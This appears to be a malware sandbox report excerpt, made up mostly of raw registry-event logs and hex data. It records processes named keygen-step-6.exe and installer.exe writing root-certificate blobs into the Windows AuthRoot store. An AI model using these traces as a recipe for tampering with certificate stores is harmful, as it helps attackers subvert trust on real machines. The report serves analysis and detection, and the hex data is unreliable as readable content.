01000000add76870bd0b3d0f0b6ac12c1658211d856e6a8c4297c4eb02d9c53af4df8268ee67092932fc8ffa84baa936db0a276dda7655d34c1e39ea9c64385cefdc8dec4a90d02e2a217a539e6aed8e609ac8647ce89b81e169066962a12c6688c691c427f2661fd19b8a09461c7403ae2690b6b962c422989a48dafb2e21ced2bd25364d2d8532dc8a82502f6ee09136d0d9872186893c60d0ddcccaadae7ebde1ecba34e1eb606a0fd4282c012c0788b6015fbaf2177f6d2b0c6278bd587aa652d90e2aae331a4148983e487590e020fadce5b047ad83b6ca7b14defd618edb3031233434e58af656b515e56a904e8bbabb781826e818b8cfa5c79b0f9213f29b5bd0ed125a74fc596f84cf802d7b22188e86b12dc222ba5952316c9283c38db39c61fbea7d922d72c884905777ffbd3232c544fe040a3b88c58b8a25229a619961ed825bc590b1bfe5496c90aa8c072a2f2cf237ecb9447c6a99e16a71c6796ba479830561949b6172b20ac900a9951ecbc99c799a2bbd54f0fa4900d4ad604aeefbfe88e34e69791f020ca338780b30c46063651b8cb032e5d291f4a74e3f64256a11c104f603000f95 MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\7289246C77593EBF\2 = "1" svchost.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEI2WPE3-XE1H-AE42-701D-DPK87XELRL76}\1 = "2204" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedHeight = "600" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = eda47e9320aed701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IFW2IAU0-YI0T-SZ81-840P-PAI76YIYJF79}\650478DC7424C37C svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010006000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c100000000000002000000e5070a005600610067007200650061007200670020006e00700070007200660066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000074ae2078e323294282c1e41cb67d5b9c000000000000000000000000d331183d0dc5d70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e5070a004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000200000073ae2078e323294282c1e41cb67d5b9c000000000000000000000000280fd03a0dc5d70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b0031004e005000310034005200370037002d0030003200520037002d0034005200350051002d004f003700340034002d00320052004f0031004e00520035003100390038004f0037007d005c0047006e00660078007a00740065002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e5070a0047006e006600780020005a006e0061006e007400720065000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000a0b891290dc5d70100000000000000000000000047006e006600780020005a006e0061006e0074007200650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00360051003800300039003300370037002d0036004e00530030002d003400340034004f002d0038003900350037002d004e00330037003700330053003000320032003000300052007d005c004a0076006100710062006a0066002000510072007300720061007100720065005c005a0046004e00460050006800760059002e0072006b007200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000000000000e50709004e0070006700760062006100660020006100720072007100720071002e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000fffffffff9a6406d323dcb4f8a86be992e03dc76000000000000000000000000218621db20aed70100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e5070900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e5070900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Processes:
keygen-step-6.exeinstaller.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-6.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2e